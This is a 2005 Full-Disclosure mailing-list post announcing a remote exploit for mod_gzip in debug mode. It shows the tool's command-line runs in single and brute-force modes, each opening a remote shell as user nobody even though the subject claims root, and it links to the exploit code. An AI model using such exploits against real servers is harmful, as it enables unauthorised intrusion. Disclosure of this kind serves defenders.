
[Full-Disclosure] Remote root exploit for mod_gzip (with debug_mode)


  • From: pk95 at yandex.ru (Alexander Antipov)
  • Subject: [Full-Disclosure] Remote root exploit for mod_gzip (with debug_mode)
  • Date: Thu Mar 24 03:30:16 2005

Hi!

/	Single mode:
\
/  	[crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost
\ 
/  	remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
\                   	by xCrZx [crazy_einstein@xxxxxxxxx] / 
\  	Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/ 
\    	[!] Connecting to localhost:80
/      	[+] Connected!
\      	[*] Trying to connect to localhost:2003 port!!! Pray for success!
/      	[*] Sleeping at 2 seconds...
\ 
/      	[!] Shell is accessible!
\ 
/      	uid=99(nobody) gid=99(nobody) groups=99(nobody)
\      	Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/ 
\	Brute mode:
/ 
\	[crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
\	remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/        	         by xCrZx [crazy_einstein@xxxxxxxxx] /05.06.03/
\
/	Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000
\
/	[~] Brutemode activated!
\	.
/	[!] Shell is accessible!
\
/	uid=99(nobody) gid=99(nobody) groups=99(nobody)
\	Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux

Code can be downloaded here:

http://www.securitylab.ru/41373.html